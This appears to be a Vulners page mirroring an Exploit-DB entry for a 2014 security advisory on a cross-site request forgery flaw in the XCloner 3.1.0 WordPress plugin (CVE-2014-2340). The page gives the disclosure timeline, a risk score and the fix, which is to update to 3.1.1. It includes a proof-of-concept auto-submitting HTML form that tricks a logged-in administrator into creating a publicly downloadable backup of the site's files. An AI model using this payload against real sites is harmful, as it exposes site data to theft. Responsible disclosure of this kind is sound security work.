Lucene search
K

WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery

🗓️ 04 Apr 2014 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 57 Views

XCloner 3.1.0 - Cross-Site Request Forgery vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability
4 Apr 201400:00
zdt
CVE
CVE-2014-2340
3 Apr 201415:00
cve
Cvelist
CVE-2014-2340
3 Apr 201415:00
cvelist
EUVD
EUVD-2014-2377
7 Oct 202500:30
euvd
exploitpack
WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery
4 Apr 201400:00
exploitpack
htbridge
Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin
12 Mar 201400:00
htbridge
NVD
CVE-2014-2340
3 Apr 201416:15
nvd
Packet Storm
WordPress XCloner 3.1.0 Cross Site Request Forgery
2 Apr 201400:00
packetstorm
Patchstack
WordPress XCloner Plugin 3.1.0 - CSRF
4 Apr 201400:00
patchstack
Prion
Cross site request forgery (csrf)
3 Apr 201416:15
prion
Rows per page
Advisory ID: HTB23206
Product: XCloner Wordpress plugin
Vendor: XCloner
Vulnerable Version(s): 3.1.0 and probably prior
Tested Version: 3.1.0
Advisory Publication:  March 12, 2014  [without technical details]
Vendor Notification: March 12, 2014 
Vendor Patch: March 13, 2014 
Public Disclosure: April 2, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2340
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.


Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340

The vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.

Simple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: 


<form action="http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm" method="post" name="main">
<input type="hidden" name="dbbackup" value="1">
<input type="hidden" name="dbbackup_comp" value="">
<input type="hidden" name="bname" value="backup">
<input type="hidden" name="backupComments" value="">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="generate">
<input type="hidden" name="boxchecked" value="0">
<input type="hidden" name="hidemainmenu" value="0">
<input type="hidden" name="" value="">
<input type="submit" name="run" value="run">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to XCloner 3.1.1

More Information:
http://www.xcloner.com/support/download/?did=9

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.
[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 26.8
EPSS0.01436
57